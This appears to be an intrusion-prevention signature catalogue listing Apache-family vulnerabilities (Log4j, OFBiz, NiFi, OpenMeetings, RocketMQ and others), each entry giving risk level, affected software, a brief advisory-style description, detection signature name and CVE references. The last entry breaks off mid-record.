Apache-Log4j-SocketServer-Untrusted-Deserialization

About this vulnerability:

A vulnerability in Apache Software Foundation Log4j

Risk:

High

First detected in:

sgpkg-ips-1222-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Software Foundation Log4j

Type:

Input Validation

Description:

There exists a vulnerability in the SocketServer class of Apache Software Foundation Log4j, versions 1.2 to 1.2.17, which allows remote attackers to execute arbitrary code by sending a specially crafted serialized object to the target system, due to the lack of a configurable class filter in the SocketServer and SocketNode classes.

Situation:

Generic_CS-Apache-Log4j-SocketServer-Untrusted-Deserialization

References:

CVE-2019-17571
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17571

Apache-Mod-Imagemap-Module-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Apache Software Foundation HTTP Server

Risk:

Moderate

First detected in:

sgpkg-ips-140-2032

Last changed:

sgpkg-ips-1641-5242

Platform:

Generic

Software:

Apache

Type:

Cross-site Scripting

Description:

There is a cross-site scripting vulnerability in Apache mod_imap and mod_imagemap Module. The flaw is due to a lack of validation of user-supplied input data. The flaw may be exploited by malicious users to execute arbitrary HTML code on the target user's web browser, in the context of a trusted web site.

Situation:

HTTP_CSU-Script-Tag-In-URI

References:

CVE-2007-5000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5000

BID-26838
http://www.securityfocus.com/bid/26838

OSVDB-39134
http://www.osvdb.org/39134

Apache-Mod-Include-Buffer-Overflow

About this vulnerability:

A vulnerability in Apache

Risk:

High

First detected in:

sgpkg-ips-410-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Buffer Overflow

Description:

A vulnerability exists in the Apache web server's Server Side Includes (SSI) functionality. A specially crafted file can trigger a memory buffer overflow. This condition allows a malicious user to stage an attack which may result in arbitrary code execution on the vulnerable system with the privileges of the Apache process.

Situation:

File-Text_Apache-Mod-Include-Buffer-Overflow

References:

CVE-2004-0940
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0940

BID-11471
http://www.securityfocus.com/bid/11471

Apache-Mod-Ssl-Log-Function-Format-String

About this vulnerability:

Apache mod_ssl module is vulnerable to a format string attack

Risk:

High

First detected in:

sgpkg-ips-140-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Format String

Description:

The mod_ssl authentication module version 2.8.18 and earlier for Apache HTTP Server is vulnerable to a format string attack. This is caused by a vulnerability in the ssl_log function within the mod_proxy hook functions. A remote attacker could exploit this vulnerability to gain access to the system.

Situation:

HTTP_CSU-Apache-SSL-Proxy-Vulnerability
HTTP8080_Apache-SSL-Proxy-Vulnerability

References:

CVE-2004-0700
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0700

BID-10736
http://www.securityfocus.com/bid/10736

OSVDB-7929
http://www.osvdb.org/7929

Apache-Mod_Auth_Pgsql-Module-Logging-Facility-Format-String-Errors

About this vulnerability:

A vulnerability in Giuseppe Tanzilli mod_auth_pgsql module

Risk:

High

First detected in:

sgpkg-ips-420-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Mod_auth_pgsql

Type:

Format String

Description:

Numerous format string vulnerabilities exist in the logging facility of the Apache mod_auth_pgsql module. The flaws are caused by the improper use of format strings contained in user supplied data. This vulnerability may be exploited by unauthenticated users to inject and execute arbitrary code. In a simple attack exploiting this vulnerability, the httpd process serving the attacker terminates, closing the connection as a result. This might also reset other connections served by the affected httpd process, in the case the HTTP server is configured to run in multiple-threading mode. In the case of a more sophisticated attack, the injected arbitrary code is executed with the privileges of the httpd process. The behaviour of the target system will be dependent on the malicious code.

Situation:

HTTP_CSH-Basic-Authentication-Username-Contains-Format-String-Characters

References:

CVE-2005-3656
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3656

BID-16153
http://www.securityfocus.com/bid/16153

Apache-Mod_ssl-Ssl_Util_uuencode_Binary-Buffer-Overflow-Vulnerability

About this vulnerability:

A vulnerability in Apache Software Foundation HTTP Server

Risk:

Moderate

First detected in:

sgpkg-ips-435-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Buffer Overflow

Description:

There is a vulnerability in the mod_ssl module of Apache 2.0, which is used for handling SSL connections. This module mod_ssl, contains a stack-based buffer overflow when handling client certificates. A malicious attacker may use this vulnerability to trigger a denial of service attack without a crafted client certificate signed by a trusted CA (Certificate Authority). As noted in section 4.1, with some compiled Apache versions, the server may be protected because the local stack is, by accident, sufficiently large. In general, a buffer overflow can potentially crash the process that is servicing HTTPS request. Depending on the target machine's Apache configuration, this may cause a denial of service. Because the data overflowing the buffer is uuencoded, exploiting this vulnerability to perform remote code execution would be extremely difficult or impossible.

Situation:

HTTPS_CS-Apache-Mod_ssl-Ssl_Util_uuencode_Binary-Buffer-Overflow-Vulnerability

References:

CVE-2004-0488
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0488

BID-10355
http://www.securityfocus.com/bid/10355

Apache-NiFi-API-Remote-Code-Execution

About this vulnerability:	A vulnerability in Apache NiFi.
Risk:	High
First detected in:	sgpkg-ips-1369-5242
Last changed:	sgpkg-ips-1369-5242
Platform:	Unix; Windows
Software:	Apache NiFi
Type:	Input Validation
Description:	A vulnerability in Apache NiFi, version 1.12.1, which allows remote attackers to execute arbitrary code by allowing the creation of an ExecuteProcess processor configured with a payload.
Situation:	HTTP_CS-Apache-NiFi-API-Remote-Code-Execution

Apache-NiFi-H2-Connection-String-Remote-Code-Execution

About this vulnerability:

An attempt to exploit a vulnerability in Apache NiFi detected

Risk:

High

First detected in:

sgpkg-ips-1728-5242

Last changed:

sgpkg-ips-1728-5242

Platform:

Linux; Unix

Software:

Apache NiFi

Type:

Input Validation

Description:

A vulnerability in Apache NiFi, versions 0.0.2 through 1.21.0, which allows remote attackers to execute arbitrary code by configuring a Database URL with the H2 driver.

Situation:

HTTP_CRL-Apache-NiFi-H2-Connection-String-Remote-Code-Execution

References:

CVE-2023-34468
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34468

Apache-NiFi-Parameter-Context-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Apache Software Foundation NiFi

Risk:

Moderate

First detected in:

sgpkg-ips-1755-5242

Last changed:

sgpkg-ips-1755-5242

Platform:

Generic

Software:

Apache NiFi

Type:

Input Validation

Description:

Improper input validation in the parameter context component causes a stored cross-site scripting vulnerability in Apache NiFi. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Apache-NiFi-Parameter-Context-Stored-Cross-Site-Scripting

References:

CVE-2024-37389
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37389

Apache-Ofbiz-Authentication-Bypass-CVE-2023-51467

About this vulnerability:

An attempt to exploit a vulnerability in Apache Software Foundation OFBiz detected

Risk:

High

First detected in:

sgpkg-ips-1670-5242

Last changed:

sgpkg-ips-1670-5242

Platform:

Generic

Software:

Apache Software Foundation OFBiz

Type:

Input Validation

Description:

The vulnerability in Apache OFBiz allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF).

Situation:

HTTP_CRL-Apache-Ofbiz-Authentication-Bypass-CVE-2023-51467

References:

CVE-2023-51467
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51467

Apache-Ofbiz-Createanoncontact-Server-Side-Template-Injection

About this vulnerability:

A vulnerability in Apache Software Foundation OFBiz

Risk:

Moderate

First detected in:

sgpkg-ips-1504-5242

Last changed:

sgpkg-ips-1504-5242

Platform:

Generic

Software:

Apache Software Foundation OFBiz

Type:

Input Validation

Description:

Improper validation of user supplied data causes a server-side template vulnerability in Apache OFBiz. A successful exploit allows an attacker to execute arbitrary code on the server.

Situation:

HTTP_CRL-Apache-Ofbiz-Createanoncontact-Server-Side-Template-Injection

References:

CVE-2022-25813
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25813

Apache-Ofbiz-CVE-2021-26295-Insecure-Deserialization

About this vulnerability:

A vulnerability in Apache Software Foundation OFBiz

Risk:

Moderate

First detected in:

sgpkg-ips-1335-5242

Last changed:

sgpkg-ips-1335-5242

Platform:

Generic

Software:

Apache Software Foundation OFBiz

Type:

Input Validation

Description:

Insecure Java deserialization when processing requests causes a vulnerability in Apache OFBiz. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Apache-Ofbiz-CVE-2021-26295-Insecure-Deserialization

References:

CVE-2021-26295
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26295

Apache-Ofbiz-CVE-2021-30128-Insecure-Deserialization

About this vulnerability:

A vulnerability in Apache Software Foundation OFBiz

Risk:

Moderate

First detected in:

sgpkg-ips-1346-5242

Last changed:

sgpkg-ips-1346-5242

Platform:

Generic

Software:

Apache Software Foundation OFBiz

Type:

Input Validation

Description:

Insecure deserialization of user-sent data causes a vulnerability in Apache OFBiz. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

File-TextId_Apache-Ofbiz-CVE-2021-30128-Insecure-Deserialization

References:

CVE-2021-30128
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30128

Apache-Ofbiz-CVE-2023-49070-XmlRpc-Insecure-Deserialization

About this vulnerability:

A vulnerability in Apache Software Foundation OFBiz

Risk:

High

First detected in:

sgpkg-ips-1669-5242

Last changed:

sgpkg-ips-1669-5242

Platform:

Generic

Software:

Apache Software Foundation OFBiz

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in Apache OFBiz. This vulnerability is due to improper validation of XML-RPC requests in an unmaintained library, as well as incomplete patches for past vulnerabilities. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request. Successful exploitation would result in arbitrary code execution.

Situation:

File-TextId_Apache-Ofbiz-CVE-2023-49070-XmlRpc-Insecure-Deserialization

References:

CVE-2023-49070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-49070

Apache-Ofbiz-CVE-2024-36104-Directory-Traversal

About this vulnerability:

A vulnerability in Apache Software Foundation OFBiz

Risk:

Moderate

First detected in:

sgpkg-ips-1750-5242

Last changed:

sgpkg-ips-1750-5242

Platform:

Generic

Software:

Apache Software Foundation OFBiz

Type:

Input Validation

Description:

Improper validation of URL data in HTTP requests causes a directory traversal vulnerability in Apache OFBiz. A successful exploitation may allow an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Apache-Ofbiz-CVE-2024-36104-Directory-Traversal

References:

CVE-2024-36104
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36104

Apache-Ofbiz-Forgot-Password-Directory-Traversal

About this vulnerability:

An attempt to exploit a vulnerability in Apache OFBiz detected

Risk:

High

First detected in:

sgpkg-ips-1742-5242

Last changed:

sgpkg-ips-1742-5242

Platform:

Linux; Windows

Software:

Apache Software Foundation OFBiz

Type:

Directory Traversal

Description:

A vulnerability in Apache OFBiz, versions prior to 18.12.13, which allows remote attackers to execute arbitrary code by allowing the access to the ProgramExport endpoint through /webtools/control/forgotPassword.

Situation:

HTTP_CSU-Apache-Ofbiz-Forgot-Password-Directory-Traversal

References:

CVE-2024-32113
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32113

Apache-Ofbiz-Loadjwt-Authentication-Bypass-CVE-2024-25065

About this vulnerability:

A vulnerability in Apache OFBiz

Risk:

High

First detected in:

sgpkg-ips-1704-5242

Last changed:

sgpkg-ips-1704-5242

Platform:

Generic

Software:

Apache Software Foundation OFBiz

Type:

Malfunction

Description:

An authentication bypass vulnerability has been reported in Apache OFBiz. This vulnerability is due to improper validation of user input. Successful exploitation would result in the authentication bypass and lead to further possible damages.

Situation:

HTTP_CSH-Apache-Ofbiz-Loadjwt-Authentication-Bypass-CVE-2024-25065

References:

CVE-2024-25065
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25065

Apache-Ofbiz-Servicecontext-Xstream-Insecure-Deserialization

About this vulnerability:

A vulnerability in Apache Software Foundation OFBiz

Risk:

Moderate

First detected in:

sgpkg-ips-1224-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Software Foundation OFBiz

Type:

Input Validation

Description:

Improper deserialization of the serviceContext parameter sent to "webtools/control/httpService" URL causes a vulnerability in Apache OFBiz. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Apache-Ofbiz-Servicecontext-Xstream-Insecure-Deserialization

References:

CVE-2019-0189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0189

Apache-Ofbiz-SSRF-And-Remote-Code-Execution-CVE-2024-45507

About this vulnerability:

An attempt to exploit a vulnerability in Apache Software Foundation OFBiz detected

Risk:

High

First detected in:

sgpkg-ips-1829-5242

Last changed:

sgpkg-ips-1829-5242

Platform:

Generic

Software:

Apache Software Foundation OFBiz

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Apache Software Foundation OFBiz detected.

Situation:

HTTP_CRL-Apache-Ofbiz-SSRF-And-Remote-Code-Execution-CVE-2024-45507

References:

CVE-2024-45507
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45507

Apache-Ofbiz-Stream-Contentid-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Apache Software Foundation OFBiz

Risk:

Moderate

First detected in:

sgpkg-ips-1267-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Software Foundation OFBiz

Type:

Input Validation

Description:

Improper handling of request parameters causes a cross-site scripting vulnerability in Apache OFBiz. A succesful exploit allows an attacker to run arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Apache-Ofbiz-Stream-Contentid-Cross-Site-Scripting

References:

CVE-2020-1943
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1943

Apache-Ofbiz-Unauthenticated-Endpoint-Code-Execution-CVE-2024-38856

About this vulnerability:

An attempt to exploit a vulnerability in Apache Software Foundation OFBiz detected

Risk:

High

First detected in:

sgpkg-ips-1790-5242

Last changed:

sgpkg-ips-1790-5242

Platform:

Generic

Software:

Apache Software Foundation OFBiz

Type:

Input Validation

Description:

Incorrect authorization vulnerability in Apache OFBiz. This issue affects Apache OFBiz through 18.12.14. Users are recommended to upgrade to version 18.12.15, which fixes the issue. Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions do not explicitly check user's permissions because they rely on the configuration of their endpoints).

Situation:

HTTP_CSU-Apache-Ofbiz-Forgot-Password-Directory-Traversal

References:

CVE-2024-38856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38856

Apache-Ofbiz-Unauthenticated-Endpoint-Code-Execution-CVE-2024-45195

About this vulnerability:

A vulnerability in Apache OFBiz

Risk:

Critical

First detected in:

sgpkg-ips-1773-5242

Last changed:

sgpkg-ips-1774-5242

Platform:

Linux; Windows

Software:

Apache Software Foundation OFBiz

Type:

Malfunction

Description:

Incorrect authorization vulnerability exists in Apache OFBiz versions prior to 18.12.16. This vulnerability allows remote attackers to bypass authentication checks and execute arbitrary code on the target system.

Situation:

HTTP_CRL-Apache-Ofbiz-Unauthenticated-Endpoint-Code-Execution-CVE-2024-45195
HTTP_CRL-Potential-Apache-Ofbiz-Unauthenticated-Endpoint-Code-Execution-CVE-2024-45195

References:

CVE-2024-45195
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45195

Apache-Ofbiz-XmlRpc-Insecure-Deserialization

About this vulnerability:

A vulnerability in Apache Software Foundation OFBiz

Risk:

High

First detected in:

sgpkg-ips-1273-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Software Foundation OFBiz

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in Apache OFBiz. This vulnerability is due to Java serialization issues when processing requests sent to "/webtools/control/xmlrpc" URL. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request. Successful exploitation would result in arbitrary code execution.

Situation:

File-Text_Apache-Ofbiz-XmlRpc-Insecure-Deserialization
File-TextId_Apache-Ofbiz-XmlRpc-Insecure-Deserialization

References:

CVE-2020-9496
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9496

Apache-Olingo-XML-External-Entity-Injection

About this vulnerability:

A vulnerability in Apache Olingo

Risk:

High

First detected in:

sgpkg-ips-1218-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Olingo

Type:

Malfunction

Description:

There exists a vulnerability in Apache Olingo, versions 4.0.0 through 4.6.0, which allows remote attckers to disclose file content on the target machine by seding a crafted request, do to a failure to configure the de-serialization engine to deny the resolution of external entities.

Situation:

HTTP_CS-Apache-Olingo-XML-External-Entity-Injection

References:

CVE-2019-17554
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17554

Apache-OpenMeetings-Cluster-Mode-Insecure-Deserialization-CVE-2024-54676

About this vulnerability:

A vulnerability in Apache OpenMeetings

Risk:

High

First detected in:

sgpkg-ips-1852-5242

Last changed:

sgpkg-ips-1852-5242

Platform:

Generic

Software:

Apache OpenMeetings

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in Apache OpenMeetings. This vulnerability is due to insufficient serialization allow list restrictions relating to clustering. A remote attacker could exploit this vulnerability by sending crafted packets to the affected process. Successful exploitation could result in arbitrary code execution under the security context of the target service.

Situation:

Generic_CS-Apache-OpenMeetings-Cluster-Mode-Insecure-Deserialization-CVE-2024-54676

References:

CVE-2024-54676
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-54676

Apache-OpenMeetings-Event-Description-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Apache Software Foundation OpenMeetings

Risk:

Moderate

First detected in:

sgpkg-ips-758-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache OpenMeetings

Type:

Input Validation

Description:

A cross-site scripting vulnerability in Apache OpenMeetings can be exploited scheduling an event with a crafted hyperlink. When successfully exploited, the attack allows the attacker to execute arbitrary script code in the context of the user's web browser.

Situation:

HTTP_CRL-Apache-OpenMeetings-Event-Description-Cross-Site-Scripting

References:

CVE-2016-2163
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2163

Apache-OpenMeetings-Nettest-Download-Upload-Size-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Software Foundation OpenMeetings

Risk:

Moderate

First detected in:

sgpkg-ips-1341-5242

Last changed:

sgpkg-ips-1341-5242

Platform:

Generic

Software:

Apache OpenMeetings

Type:

Malfunction

Description:

Improper restrictions on download and upload sizes on the NetTest endpoint causes a denial of service vulnerability in Apache OpenMeetings.

Situation:

HTTP_CRL-Apache-OpenMeetings-Nettest-Download-Upload-Size-Denial-Of-Service

References:

CVE-2021-27576
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27576

Apache-OpenMeetings-Nettest-Web-Service-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Software Foundation OpenMeetings

Risk:

Moderate

First detected in:

sgpkg-ips-1363-5242

Last changed:

sgpkg-ips-1363-5242

Platform:

Generic

Software:

Apache OpenMeetings

Type:

Malfunction

Description:

There exists a denial of service vulnerability in Apache OpenMeetings. Successful exploitation could lead in network exhaustion and denial of service.

Situation:

HTTP_CSU-Apache-OpenMeetings-Nettest-Web-Service-Denial-Of-Service

References:

CVE-2020-13951
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13951

Apache-OpenMeetings-Zip-File-Path-Traversal

About this vulnerability:

A vulnerability in Apache Software Foundation OpenMeetings

Risk:

Moderate

First detected in:

sgpkg-ips-750-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache OpenMeetings

Type:

Directory Traversal

Description:

Improper validation of paths inside ZIP files allow an attacker to upload files containing code that will be executed with the privileges of the server process.

Situation:

File-Zip_Apache-OpenMeetings-Zip-File-Path-Traversal

References:

CVE-2016-0784
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0784

Apache-OpenOffice-Dbase-File-Handling-Buffer-Overflow

About this vulnerability:

A vulnerability in Apache Software Foundation OpenOffice

Risk:

High

First detected in:

sgpkg-ips-1393-5242

Last changed:

sgpkg-ips-1393-5242

Platform:

Generic

Software:

Apache OpenOffice

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Apache OpenOffice for Windows. The vulnerability is due a flaw when opening a crafted DBF file with crafted records. A remote attacker could exploit the vulnerability by enticing an user to open a maliciously crafted openoffice file with the affected software. Successful exploitation could result in arbitrary code execution in the context of the user.

Situation:

File-Binary_Apache-OpenOffice-Dbase-File-Handling-Buffer-Overflow

References:

CVE-2021-33035
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33035

Apache-OpenOffice-Text-Document-Malicious-Macro-Execution

About this vulnerability:	An Apache OpenOffice Text Document Malicious Macro Execution vulnerability
Risk:	High
First detected in:	sgpkg-ips-1022-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows; Linux
Software:	Apache OpenOffice
Type:	Insecure Configuration
Description:	A vulnerability in Apache OpenOffice which allows remote attackers to execute arbitrary code via a malicious macro placed in a text document.
Situation:	File-Text_Apache-OpenOffice-Text-Document-Malicious-Macro-Execution

Apache-Pluto-Portletv3annotateddemo-Multipartportlet-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Apache Software Foundation Pluto

Risk:

Moderate

First detected in:

sgpkg-ips-1110-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Pluto

Type:

Malfunction

Description:

Improper validation of HTTP requests causes an arbitrary file upload vulnerability in Apache Pluto. A successful exploit allows an attacker to upload abitrary files to the target system.

Situation:

HTTP_CRL-Apache-Pluto-Portletv3annotateddemo-Multipartportlet-Arbitrary-File-Upload

References:

CVE-2018-1306
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1306

Apache-Pulsar-JSON-Web-Token-Authentication-Bypass

About this vulnerability:

A vulnerability in Apache Software Foundation Pulsar

Risk:

Moderate

First detected in:

sgpkg-ips-1363-5242

Last changed:

sgpkg-ips-1363-5242

Platform:

Generic

Software:

Apache Software Foundation Pulsar

Type:

Malfunction

Description:

There exists an authentication bypass vulnerability in the JSON Web Token authentication module of Apache Pulsar. Successful exploitation could lead in authentication bypass of the affected service.

Situation:

Generic_CS-Apache-Pulsar-JSON-Web-Token-Authentication-Bypass
HTTP_CSH-Apache-Pulsar-JSON-Web-Token-Authentication-Bypass

References:

CVE-2021-22160
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22160

Apache-Pulsar-Unpack-Directory-Traversal

About this vulnerability:

A vulnerability in Apache Pulsar

Risk:

High

First detected in:

sgpkg-ips-1718-5242

Last changed:

sgpkg-ips-1718-5242

Platform:

Generic

Software:

Apache Software Foundation Pulsar

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in Apache Pulsar. The vulnerability is due to improper validation of file names inside of .jar or .nar files uploaded to the server. Successful exploitation could result in an attacker writing files to arbitrary locations on the target server, which may lead to arbitrary code execution under the security context of the user running the Pulsar server.

Situation:

File-Member-Name_Apache-Pulsar-Unpack-Directory-Traversal

References:

CVE-2024-27317
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27317

Apache-Qpid-Sequence-Set-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Software Foundation QPID

Risk:

High

First detected in:

sgpkg-ips-639-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache QPID

Type:

Input Validation

Description:

A denial of service vulnerability exists in Apache Qpid. The vulnerability is due to an assertion failure while processing a sequence-set type field with the maximum possible range. A remote, unauthenticated attacker could exploit this vulnerability by sending any control or command assembly that requires a sequence-set type field with a maximum possible range to the QPID broker. Successful exploitation will lead to abnormal termination of the program resulting in a denial of service condition

Situation:

Generic_CS-Apache-Qpid-Sequence-Set-Denial-Of-Service

References:

CVE-2015-0203
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0203

OSVDB-117019
http://www.osvdb.org/117019

Apache-Qpid-Session.gap-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Software Foundation QPID

Risk:

High

First detected in:

sgpkg-ips-637-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache QPID

Type:

Input Validation

Description:

A denial of service vulnerability exists in Apache Qpid. The vulnerability is due to an assertion failure prior to session establishment when processing the session.gap control segment. A remote, authenticated attacker could exploit this vulnerability by sending an out of sequence session.gap packet to the QPID broker. Successful exploitation will lead to abnormal termination of the program resulting in a denial of service condition.

Situation:

Generic_CS-Apache-Qpid-Session.gap-Denial-Of-Service

References:

CVE-2015-0203
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0203

OSVDB-117019
http://www.osvdb.org/117019

Apache-Rave-User-Information-Disclosure

About this vulnerability:

An Apache Rave User Information Disclosure vulnerability.

Risk:

High

First detected in:

sgpkg-ips-702-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Rave

Type:

Configuration Error

Description:

A vulnerability in Apache Rave, versions 0.11 through 0.20, which allows remote attackers to obtain sensitive information about all user accounts via the offset parameter.

Situation:

HTTP_CSU-Apache-Rave-User-Information-Disclosure

References:

CVE-2013-1814
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1814

BID-58455
http://www.securityfocus.com/bid/58455

OSVDB-91235
http://www.osvdb.org/91235

Apache-RocketMQ-Buildstartcommand-Command-Injection

About this vulnerability:

A vulnerability in Apache Software Foundation RocketMQ

Risk:

Moderate

First detected in:

sgpkg-ips-1610-5242

Last changed:

sgpkg-ips-1610-5242

Platform:

Generic

Software:

Apache RocketMQ

Type:

Input Validation

Description:

Improper validation of the configuration file of a broker server causes a command injection vulnerability in Apache RocketMQ. A successful exploit allows an attacker to execute arbitrary code on the target system with the privileges of the affected application.

Situation:

Generic_CS-Apache-RocketMQ-Buildstartcommand-Command-Injection

References:

CVE-2023-33246
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33246

Apache-RocketMQ-Nameserver-configStorePath-Arbitrary-File-Write

About this vulnerability:

A vulnerability in Apache RocketMQ

Risk:

High

First detected in:

sgpkg-ips-1673-5242

Last changed:

sgpkg-ips-1673-5242

Platform:

Generic

Software:

Apache RocketMQ

Type:

Malfunction

Description:

An arbitrary file write vulnerability has been reported in the NameServer component of Apache RocketMQ. A successful exploit allows an attacker to execute arbitrary code on the target system with the privileges of the affected application.

Situation:

Generic_CS-Apache-RocketMQ-Nameserver-configStorePath-Arbitrary-File-Write

References:

CVE-2023-37582
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-37582

Apache-Roller-OGNL-Injection-Remote-Code-Execution

About this vulnerability:

A vulnerability in Apache Software Foundation Apache Roller

Risk:

Moderate

First detected in:

sgpkg-ips-556-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Roller

Type:

Input Validation

Description:

There is a command execution vulnerability in Apache Roller. The vulnerability is due to a lack of sanitization on OGNL expressions passed to certain methods. This can lead to OGNL injection which can result in remote code execution. A remote unauthenticated attacker could exploit this vulnerability by sending crafted requests to a site using the vulnerable application. Successful exploitation could lead to remote code execution in the context of the affected application.

Situation:

HTTP_CSU-Apache-Roller-OGNL-Injection-Remote-Code-Execution

References:

CVE-2013-4212
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4212

BID-63928
http://www.securityfocus.com/bid/63928

OSVDB-100342
http://www.osvdb.org/100342

Apache-Root-Privilege-Escalation

About this vulnerability:

An attempt to exploit a vulnerability in Apache detected

Risk:

High

First detected in:

sgpkg-ips-1405-5242

Last changed:

sgpkg-ips-1405-5242

Platform:

Generic

Software:

Apache

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Apache detected.

Situation:

File-Text_Apache-Root-Privilege-Escalation

References:

CVE-2019-0211
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0211

Apache-Santuario-Xml-Security-For-Java-Dtd-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Software Foundation Santuario XML Security for Java

Risk:

High

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Santuario; Apache XML Security for Java

Type:

Malfunction

Description:

A denial of service vulnerability exists in Apache Santuario XML Security for Java. The vulnerability is due to the allowing of Document Type Definitions (DTDs) when validating signatures. A remote attacker can exploit this vulnerability by providing a specially crafted XML signature. Successful exploitation could result in the application crashing resulting in a denial of service condition.

Situation:

HTTP_CS-Xml-Dtd-Nested-Entities-Multiple-Vulnerabilities
File-Text_Xml-Dtd-Nested-Entities-Multiple-Vulnerabilities

References:

CVE-2013-4517
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4517

BID-64437
http://www.securityfocus.com/bid/64437

OSVDB-101169
http://www.osvdb.org/101169

Apache-Shardingsphere-SnakeYaml-Insecure-Deserialization

About this vulnerability:

A vulnerability in Apache Software Foundation ShardingSphere

Risk:

Moderate

First detected in:

sgpkg-ips-1240-5242

Last changed:

sgpkg-ips-1663-5242

Platform:

Generic

Software:

Apache ShardingSphere

Type:

Input Validation

Description:

There has been reported a remote code execution vulnerability in Apache ShardingSphere. Successful exploitation could result in arbitrary code execution.

Situation:

HTTP_CRL-Apache-Shardingsphere-SnakeYaml-Insecure-Deserialization

References:

CVE-2020-1947
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1947

Apache-ShenYu-Admin-JWT-Authentication-Bypass-Vulnerability

About this vulnerability:

A vulnerability in Apache ShenYu Admin.

Risk:

High

First detected in:

